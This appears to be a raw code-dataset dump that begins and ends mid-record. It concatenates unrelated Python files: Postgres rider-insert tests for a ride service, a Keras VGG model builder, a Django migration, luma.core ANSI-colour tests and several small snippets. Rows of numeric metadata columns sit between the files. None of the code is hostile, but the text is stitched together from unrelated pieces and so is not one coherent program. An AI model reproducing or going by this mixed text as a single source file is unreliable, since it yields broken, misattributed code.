error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_015_TotalPartySize_invalid_negative(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '-10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)>0
assert error_code==2
assert len(uuid)==0
pgdbConn.commit()
def test_insert_rider_016_RiderPreferredContact_valid_SMS(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'SMS',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)==0
assert error_code==0
assert len(uuid)>0
pgdbConn.commit()
def test_insert_rider_017_RiderPreferredContact_valid_Email(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Email',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)==0
assert error_code==0
assert len(uuid)>0
pgdbConn.commit()
def test_insert_rider_018_RiderPreferredContact_valid_Phone(pgdbConn):
args = {
'IPAddress' : '127.0.0.1',
'RiderFirstName' : 'John',
'RiderLastName' : 'Doe',
'RiderEmail' : 'john.doe@gmail.com',
'RiderPhone' : '555-555-555',
'RiderCollectionZIP' : '90210',
'RiderDropOffZIP' : '90210',
'AvailableRideTimesLocal' : '2018-10-01T02:00/2018-10-01T03:00|2019-10-01T02:00/2019-10-01T03:00',
'TotalPartySize' : '10',
'TwoWayTripNeeded' : 'True',
'RiderIsVulnerable' : 'True',
'RiderWillNotTalkPolitics' : 'True',
'PleaseStayInTouch' : 'True',
'NeedWheelchair' : 'True',
'RiderPreferredContact' : 'Phone',
'RiderAccommodationNotes' : 'I am picky',
'RiderLegalConsent' : 'True',
'RiderWillBeSafe' : 'True',
'RiderCollectionAddress' : 'at home',
'RiderDestinationAddress' : 'at the polls'
}
results = generic_rider_insert(pgdbConn, args)
uuid=results['uuid']
error_code=results['error_code']
error_text=results['error_text']
assert len(error_text)==0
assert error_code==0
assert len(uuid)>0
pgdbConn.commit()
| 33.735007
| 106
| 0.600339
| 2,175
| 24,188
| 6.550805
| 0.054713
| 0.036637
| 0.019582
| 0.024003
| 0.906513
| 0.906513
| 0.906513
| 0.906513
| 0.906513
| 0.906513
| 0
| 0.073384
| 0.254093
| 24,188
| 716
| 107
| 33.782123
| 0.716329
| 0
| 0
| 0.854864
| 0
| 0.020734
| 0.444105
| 0.159501
| 0
| 0
| 0
| 0
| 0.092504
| 1
| 0.033493
| false
| 0
| 0.00319
| 0.001595
| 0.039872
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb94e576ddf818945339ae70a9b555a6796cd185
| 6,583
|
py
|
Python
|
src/models.py
|
nidolow/image-classification
|
1231878f57adb74887aa3c6671ce9466fde7c3fc
|
[
"MIT"
] | 1
|
2022-01-17T05:01:50.000Z
|
2022-01-17T05:01:50.000Z
|
src/models.py
|
nidolow/image-classification
|
1231878f57adb74887aa3c6671ce9466fde7c3fc
|
[
"MIT"
] | 4
|
2021-06-08T21:56:35.000Z
|
2022-03-12T00:38:38.000Z
|
src/models.py
|
nidolow/image-classification
|
1231878f57adb74887aa3c6671ce9466fde7c3fc
|
[
"MIT"
] | null | null | null |
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten, Dropout, MaxPooling2D, BatchNormalization, ReLU
def add_conv(model, filters, dropout, batch_norm):
"""
Adds to model convolution layer with optional dropout and batch normalization.
Args:
model (Sequential): object with model structure
filters (int): number of filters
dropout (bool): if True adds dropout
batch_norm (boot): if True adds batch normalization
"""
model.add(Conv2D(filters, 3, padding='same', activation=None))
if batch_norm: model.add(BatchNormalization())
model.add(ReLU())
if dropout: model.add(Dropout(0.25))
def generate_model(conf):
"""
Initializes model structure.
Args:
conf (dict): model configuration parameters
Returns:
model (Sequential): object with model structure
Raises:
KeyError: if there is not 'arch' key in configuration dict
ValueError: if 'arch' parameter does not match known model structure
"""
if 'arch' not in conf:
raise KeyError('Missing "arch" in config.')
if conf['arch'] == 'vgg_v1':
return get_vgg_v1(conf)
if conf['arch'] == 'vgg_v2':
return get_vgg_v2(conf)
if conf['arch'] == 'baseline':
return get_baseline(conf)
raise ValueError('Unknown value for "arch" in config: '+conf['arch'])
def get_vgg_v1(conf):
"""
Generates object with predefined VGG model structure.
Args:
conf (dict): model configuration parameters
Returns:
model (Sequential): object with model structure
"""
model = Sequential()
model.add(Conv2D(32, 3, padding='same', activation=None, input_shape=(conf['height'], conf['width'], 3)))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
add_conv(model, 32, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 64, conf['dropout'], conf['batch_norm'])
add_conv(model, 64, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(512, activation=None))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
model.add(Dense(512, activation=None))
if conf['dropout']: model.add(Dropout(0.25))
model.add(ReLU())
if conf['batch_norm']: model.add(BatchNormalization())
model.add(Dense(3, activation='softmax'))
return model
def get_vgg_v2(conf):
"""
Generates object with predefined bigger VGG model structure.
Args:
conf (dict): model configuration parameters
Returns:
model (Sequential): object with model structure
"""
model = Sequential()
model.add(Conv2D(64, 3, padding='same', activation=None, input_shape=(conf['height'], conf['width'], 3)))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
add_conv(model, 64, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
add_conv(model, 128, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
add_conv(model, 256, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
add_conv(model, 512, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(512, activation=None))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
model.add(Dense(512, activation=None))
if conf['dropout']: model.add(Dropout(0.25))
model.add(ReLU())
if conf['batch_norm']: model.add(BatchNormalization())
model.add(Dense(3, activation='softmax'))
return model
def get_baseline(conf):
"""
Generates object with predefined baseline model structure.
Args:
conf (dict): model configuration parameters
Returns:
model (Sequential): object with model structure
"""
model = Sequential()
model.add(Conv2D(16, 3, padding='same', activation=None, input_shape=(conf['height'], conf['width'], 3)))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 32, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
add_conv(model, 64, conf['dropout'], conf['batch_norm'])
model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(512, activation=None))
if conf['batch_norm']: model.add(BatchNormalization())
model.add(ReLU())
if conf['dropout']: model.add(Dropout(0.25))
model.add(Dense(3, activation='softmax'))
return model
| 34.465969
| 109
| 0.64621
| 878
| 6,583
| 4.73918
| 0.109339
| 0.105744
| 0.106224
| 0.12497
| 0.821677
| 0.791637
| 0.776256
| 0.776256
| 0.769286
| 0.75751
| 0
| 0.038721
| 0.187908
| 6,583
| 190
| 110
| 34.647368
| 0.739618
| 0.165122
| 0
| 0.786408
| 0
| 0
| 0.143157
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048544
| false
| 0
| 0.019417
| 0
| 0.126214
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ccdef88b8ffb205aafe91409649c16fc474029de
| 117
|
py
|
Python
|
labs/space_station/solutions/tropiques.py
|
letstrythat/scientificpython
|
522bd70d66e4d985e5c22b1dc25b75f208910bb7
|
[
"MIT"
] | null | null | null |
labs/space_station/solutions/tropiques.py
|
letstrythat/scientificpython
|
522bd70d66e4d985e5c22b1dc25b75f208910bb7
|
[
"MIT"
] | null | null | null |
labs/space_station/solutions/tropiques.py
|
letstrythat/scientificpython
|
522bd70d66e4d985e5c22b1dc25b75f208910bb7
|
[
"MIT"
] | null | null | null |
print(earth.at(ts.utc(2017, 6, 21)).observe(sun).radec())
print(earth.at(ts.utc(2017, 12, 22)).observe(sun).radec())
| 39
| 58
| 0.675214
| 22
| 117
| 3.590909
| 0.590909
| 0.253165
| 0.303797
| 0.35443
| 0.531646
| 0.531646
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 0.051282
| 117
| 2
| 59
| 58.5
| 0.576577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
15e10ee88525ade30223670ab84756d962e6bcef
| 485
|
py
|
Python
|
tests/pyflakes_bears/pep8_naming_test_files/E07/valid.py
|
MacBox7/coala-pyflakes
|
637f8a2e77973384be79d30b0dae1f43072e60c8
|
[
"MIT"
] | null | null | null |
tests/pyflakes_bears/pep8_naming_test_files/E07/valid.py
|
MacBox7/coala-pyflakes
|
637f8a2e77973384be79d30b0dae1f43072e60c8
|
[
"MIT"
] | 12
|
2018-05-21T06:12:59.000Z
|
2018-07-30T10:37:16.000Z
|
tests/pyflakes_bears/pep8_naming_test_files/E07/valid.py
|
MacBox7/coala-pyflakes
|
637f8a2e77973384be79d30b0dae1f43072e60c8
|
[
"MIT"
] | 1
|
2018-06-10T16:16:47.000Z
|
2018-06-10T16:16:47.000Z
|
def __getattr__():
pass
class C1:
def __str__(self):
return ''
def foo(self):
'''
>>> class Good():
... def __str__(self):
... return 1
'''
pass
class C2:
if True:
def __str__(self):
return ''
class C3:
try:
if True:
while True:
def __str__(self):
return ''
break
except:
pass
| 16.166667
| 38
| 0.375258
| 42
| 485
| 3.857143
| 0.452381
| 0.148148
| 0.246914
| 0.395062
| 0.246914
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0.521649
| 485
| 29
| 39
| 16.724138
| 0.681034
| 0.134021
| 0
| 0.55
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.15
| 0
| 0.15
| 0.55
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
c619731997551d719584d94379175a2b31ec3728
| 509
|
py
|
Python
|
test.py
|
itshoro/AniListPy
|
953c67dfa475c966c38b48b15e6e216a4b82b671
|
[
"MIT"
] | 1
|
2021-01-18T02:25:04.000Z
|
2021-01-18T02:25:04.000Z
|
test.py
|
itshoro/AniListPy
|
953c67dfa475c966c38b48b15e6e216a4b82b671
|
[
"MIT"
] | null | null | null |
test.py
|
itshoro/AniListPy
|
953c67dfa475c966c38b48b15e6e216a4b82b671
|
[
"MIT"
] | null | null | null |
# Query Animes
from anilistpy.test.test_queries import test_query_single_anime_by_id, test_query_single_anime_by_name, test_query_multiple_anime_by_ids
test_query_single_anime_by_id()
test_query_single_anime_by_name()
test_query_multiple_anime_by_ids()
# Query Manga
from anilistpy.test.test_queries import test_query_single_manga_by_id, test_query_single_manga_by_name, test_query_multiple_manga_by_ids
test_query_single_manga_by_id()
test_query_single_manga_by_name()
test_query_multiple_manga_by_ids()
| 33.933333
| 136
| 0.901768
| 88
| 509
| 4.511364
| 0.170455
| 0.27204
| 0.302267
| 0.201511
| 0.947103
| 0.947103
| 0.947103
| 0.947103
| 0.947103
| 0.775819
| 0
| 0
| 0.05501
| 509
| 14
| 137
| 36.357143
| 0.825364
| 0.047151
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c63583c0dd206a233be1c1966187b01505d05bc0
| 437
|
py
|
Python
|
cupyx/scipy/ndimage/__init__.py
|
andersk/cupy
|
c73a325dd034ee9abfac2c4af11aa9107ec89042
|
[
"MIT"
] | 2
|
2020-02-28T09:27:58.000Z
|
2020-10-12T07:10:24.000Z
|
cupyx/scipy/ndimage/__init__.py
|
andersk/cupy
|
c73a325dd034ee9abfac2c4af11aa9107ec89042
|
[
"MIT"
] | null | null | null |
cupyx/scipy/ndimage/__init__.py
|
andersk/cupy
|
c73a325dd034ee9abfac2c4af11aa9107ec89042
|
[
"MIT"
] | null | null | null |
from cupyx.scipy.ndimage.filters import correlate # NOQA
from cupyx.scipy.ndimage.filters import convolve # NOQA
from cupyx.scipy.ndimage.interpolation import affine_transform # NOQA
from cupyx.scipy.ndimage.interpolation import map_coordinates # NOQA
from cupyx.scipy.ndimage.interpolation import rotate # NOQA
from cupyx.scipy.ndimage.interpolation import shift # NOQA
from cupyx.scipy.ndimage.interpolation import zoom # NOQA
| 48.555556
| 70
| 0.82151
| 58
| 437
| 6.155172
| 0.293103
| 0.176471
| 0.27451
| 0.411765
| 0.817927
| 0.806723
| 0.616247
| 0
| 0
| 0
| 0
| 0
| 0.114416
| 437
| 8
| 71
| 54.625
| 0.922481
| 0.077803
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
c6552e7166dc303f7bf6d7787dfa0a79e9b62947
| 158
|
py
|
Python
|
bin/__init__.py
|
JackHumphries9/ida
|
a234484cdcd0e19612911b4f548ceb40bb22fad4
|
[
"MIT"
] | null | null | null |
bin/__init__.py
|
JackHumphries9/ida
|
a234484cdcd0e19612911b4f548ceb40bb22fad4
|
[
"MIT"
] | null | null | null |
bin/__init__.py
|
JackHumphries9/ida
|
a234484cdcd0e19612911b4f548ceb40bb22fad4
|
[
"MIT"
] | null | null | null |
from bin import core
from bin import _font
#from bin import _settings
from bin import _console
from bin import _packageManager
from bin import __tkinterp
| 26.333333
| 32
| 0.816456
| 24
| 158
| 5.125
| 0.375
| 0.341463
| 0.634146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177215
| 158
| 6
| 33
| 26.333333
| 0.946154
| 0.158228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d695b9b6b6f2b2b5e78934445d5d03550dd3738d
| 3,717
|
py
|
Python
|
backend/stock/migrations/0005_auto_20210213_0207.py
|
fengxia41103/stock
|
1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1
|
[
"MIT"
] | 1
|
2021-09-30T05:25:08.000Z
|
2021-09-30T05:25:08.000Z
|
backend/stock/migrations/0005_auto_20210213_0207.py
|
fengxia41103/stock
|
1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1
|
[
"MIT"
] | 8
|
2021-09-30T05:27:09.000Z
|
2021-12-03T23:02:24.000Z
|
backend/stock/migrations/0005_auto_20210213_0207.py
|
fengxia41103/stock
|
1bba08f77e9038ebdd3905fe734bb51e5fb1bdf1
|
[
"MIT"
] | 3
|
2021-09-29T05:11:45.000Z
|
2021-10-31T07:26:31.000Z
|
# Generated by Django 3.1.6 on 2021-02-13 02:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stock', '0004_incomestatement'),
]
operations = [
migrations.AlterField(
model_name='incomestatement',
name='ebit',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='general_and_administrative_expense',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='gross_profit',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='net_income',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='normalized_ebitda',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='normalized_income',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='on',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='operating_expense',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='operating_income',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='operating_revenue',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='pretax_income',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='reconciled_cost_of_revenue',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='research_and_development',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='selling_and_marketing_expense',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='selling_general_and_administration',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='total_expenses',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='total_operating_income_as_reported',
field=models.FloatField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='incomestatement',
name='total_revenue',
field=models.FloatField(blank=True, default=0, null=True),
),
]
| 35.740385
| 70
| 0.587033
| 341
| 3,717
| 6.260997
| 0.175953
| 0.168618
| 0.210773
| 0.244496
| 0.841218
| 0.841218
| 0.818735
| 0.818735
| 0.818735
| 0.78829
| 0
| 0.013836
| 0.299973
| 3,717
| 103
| 71
| 36.087379
| 0.806687
| 0.012107
| 0
| 0.731959
| 1
| 0
| 0.171117
| 0.049319
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.010309
| 0
| 0.041237
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ba44d83bfc25ad50a02b744b06ec66399015e78f
| 4,046
|
py
|
Python
|
tests/test_ansi_color.py
|
jakiee3y/luma.core
|
713de8e4e397493dd196e8e7653268877135ffe9
|
[
"MIT"
] | 114
|
2017-01-13T16:06:46.000Z
|
2022-03-23T23:51:45.000Z
|
tests/test_ansi_color.py
|
plaes/luma.core
|
884b60de14becc5ee25798d48e4d83c56d228840
|
[
"MIT"
] | 192
|
2017-01-12T18:00:00.000Z
|
2022-02-20T22:38:31.000Z
|
tests/test_ansi_color.py
|
plaes/luma.core
|
884b60de14becc5ee25798d48e4d83c56d228840
|
[
"MIT"
] | 58
|
2017-01-21T13:54:03.000Z
|
2022-03-06T15:48:27.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2017-18 Richard Hull and contributors
# See LICENSE.rst for details.
"""
Tests for the :py:mod:`luma.core.ansi_color` module.
"""
import pytest
from luma.core import ansi_color
def test_parse_str_no_escape():
gen = ansi_color.parse_str("hello world")
assert next(gen) == ["putch", "h"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["putch", "w"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "d"]
with pytest.raises(StopIteration):
next(gen)
def test_parse_str_valid_ansi_colors():
gen = ansi_color.parse_str("hello \033[31mworld\33[0m")
assert next(gen) == ["putch", "h"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["foreground_color", "red"]
assert next(gen) == ["putch", "w"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "d"]
assert next(gen) == ["reset"]
with pytest.raises(StopIteration):
next(gen)
def test_parse_str_valid_ansi_colors_extended_codeset():
gen = ansi_color.parse_str(u"á \033[31mFußgänger Текст на\033[0m")
assert next(gen) == ["putch", u"á"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["foreground_color", "red"]
assert next(gen) == ["putch", "F"]
assert next(gen) == ["putch", "u"]
assert next(gen) == ["putch", u"ß"]
assert next(gen) == ["putch", "g"]
assert next(gen) == ["putch", u"ä"]
assert next(gen) == ["putch", "n"]
assert next(gen) == ["putch", "g"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["putch", u"Т"]
assert next(gen) == ["putch", u"е"]
assert next(gen) == ["putch", u"к"]
assert next(gen) == ["putch", u"с"]
assert next(gen) == ["putch", u"т"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["putch", u"н"]
assert next(gen) == ["putch", u"а"]
assert next(gen) == ["reset"]
with pytest.raises(StopIteration):
next(gen)
def test_parse_str_multiple_ansi_colors():
gen = ansi_color.parse_str("hello \033[32;46mworld\33[7;0m")
assert next(gen) == ["putch", "h"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["foreground_color", "green"]
assert next(gen) == ["background_color", "cyan"]
assert next(gen) == ["putch", "w"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "d"]
assert next(gen) == ["reverse_colors"]
assert next(gen) == ["reset"]
with pytest.raises(StopIteration):
next(gen)
def test_parse_str_unknown_ansi_colors_ignored():
gen = ansi_color.parse_str("hello \033[27mworld")
assert next(gen) == ["putch", "h"]
assert next(gen) == ["putch", "e"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", " "]
assert next(gen) == ["putch", "w"]
assert next(gen) == ["putch", "o"]
assert next(gen) == ["putch", "r"]
assert next(gen) == ["putch", "l"]
assert next(gen) == ["putch", "d"]
with pytest.raises(StopIteration):
next(gen)
def test_strip_ansi_codes():
gen = ansi_color.strip_ansi_codes("hello \033[27mworld")
assert gen == "hello world"
| 32.368
| 70
| 0.562037
| 537
| 4,046
| 4.141527
| 0.175047
| 0.242356
| 0.420863
| 0.517986
| 0.795863
| 0.733813
| 0.722572
| 0.709982
| 0.709982
| 0.621403
| 0
| 0.01408
| 0.210084
| 4,046
| 124
| 71
| 32.629032
| 0.68179
| 0.0435
| 0
| 0.680412
| 0
| 0
| 0.166364
| 0.006219
| 0
| 0
| 0
| 0
| 0.752577
| 1
| 0.061856
| false
| 0
| 0.020619
| 0
| 0.082474
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
242ac62761c06b934c502cbd6ac5177e563c1322
| 4,367
|
py
|
Python
|
rwmem/memory.py
|
iduel/ReadMem
|
a732405a12344b3cb8e42adade8f6bfb69be0435
|
[
"MIT"
] | null | null | null |
rwmem/memory.py
|
iduel/ReadMem
|
a732405a12344b3cb8e42adade8f6bfb69be0435
|
[
"MIT"
] | null | null | null |
rwmem/memory.py
|
iduel/ReadMem
